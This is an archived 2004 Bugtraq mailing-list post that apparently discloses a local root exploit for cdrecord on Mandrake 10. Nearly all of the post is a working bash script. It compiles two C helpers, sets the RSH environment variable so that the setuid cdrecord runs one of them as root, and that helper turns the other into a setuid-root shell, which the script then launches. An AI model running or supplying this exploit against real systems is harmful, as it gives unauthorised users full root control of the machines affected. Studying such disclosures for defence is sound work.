lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040910013017.6602.qmail@www.securityfocus.com>
Date: 10 Sep 2004 01:30:17 -0000
From: newbug Tseng <newbug@...oot.org>
To: bugtraq@...urityfocus.com
Subject: cdrecord local root exploit




#!/bin/bash

echo "cdr-exp.sh -- CDRecord local exploit ( Tested on cdrecord-2.01-0.a27.2mdk + Mandrake10)"
echo "Author    : newbug [at] chroot.org"
echo "IRC       : irc.chroot.org #chroot"
echo "Date      :09.09.2004"

cd /tmp
cat > s.c <<_EOF_
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main()
{
        setuid(0);setgid(0);
        chown("/tmp/ss", 0, 0);
        chmod("/tmp/ss", 04755);

        return 0;
}

_EOF_

cat > ss.c <<_EOF_
#include <stdio.h>

int main()
{
        setuid(0);setgid(0);
        execl("/bin/bash","bash",(char *)0);

        return 0;
}
_EOF_

gcc -o s s.c
gcc -o ss ss.c

export RSH=/tmp/s
cdrecord  dev=REMOTE:newbug@....chroot.org:0,0,0 /blah/blah >/dev/null 2>&1
/tmp/ss



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ